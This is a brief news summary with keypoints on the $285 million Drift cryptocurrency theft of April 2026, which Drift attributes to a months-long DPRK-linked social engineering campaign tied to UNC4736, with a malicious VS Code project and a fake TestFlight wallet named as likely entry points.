Drift says the April 1, 2026 theft of $285 million was the culmination of a months-long, targeted social engineering operation by DPRK-linked actors who built trust through in-person meetings, Telegram groups, and a fake trading firm. The campaign deployed supply-chain tactics (a malicious VS Code project and a fraudulent TestFlight wallet), showed on-chain links to the Radiant Capital attackers, and aligns with a broader DPRK strategy of fragmented malware operations and IT worker fraud. #UNC4736 #Drift
Keypoints
- Drift attributed the $285 million April 1, 2026 heist to a six-month DPRK-led social engineering campaign.
- Security firms associate the operation with UNC4736 (aka AppleJeus/Citrine Sleet/Golden Chollima/Gleaming Pisces) and prior incidents like Radiant Capital and the 3CX breach.
- Adversaries gained trust through in-person meetings at conferences, Telegram engagement, and depositing funds to onboard an Ecosystem Vault.
- Likely intrusion vectors were a malicious VS Code tasks.json payload in a cloned repo and a fraudulent TestFlight wallet app.
- The DPRK now employs a fragmented malware ecosystem and multinational IT-worker fraud to steal cryptocurrency and funnel revenue to the regime.
Read More: https://thehackernews.com/2026/04/285-million-drift-hack-traced-to-six.html